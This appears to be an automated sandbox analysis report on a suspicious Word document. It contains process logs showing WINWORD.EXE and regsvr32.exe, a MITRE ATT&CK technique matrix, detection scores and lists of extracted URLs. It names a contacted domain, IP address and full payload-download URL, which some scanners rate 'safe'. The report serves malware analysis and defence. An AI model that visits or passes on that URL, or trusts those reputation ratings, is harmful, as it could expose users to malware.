Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting12DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting12NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Datei-04.28.2021.doc13%VirustotalBrowse
Datei-04.28.2021.doc100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
better-transport-2008.com1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/40%Avira URL Cloudsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
better-transport-2008.com
45.142.215.160
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://better-transport-2008.com/bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTsfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
    high
    https://login.microsoftonline.com/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
      high
      https://shell.suite.office.com:1443A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
          high
          https://autodiscover-s.outlook.com/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
              high
              https://cdn.entity.A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                    high
                    https://powerlift.acompli.netA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                      high
                      https://cortana.aiA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                high
                                https://api.aadrm.com/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                      high
                                      https://cr.office.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/OfficeA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                            high
                                            https://graph.ppe.windows.netA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                            high
                                                            https://graph.windows.netA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/A87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechA87B51A9-A3C7-4F56-B132-575A1B8D2861.0.drfalse
                                                                      high
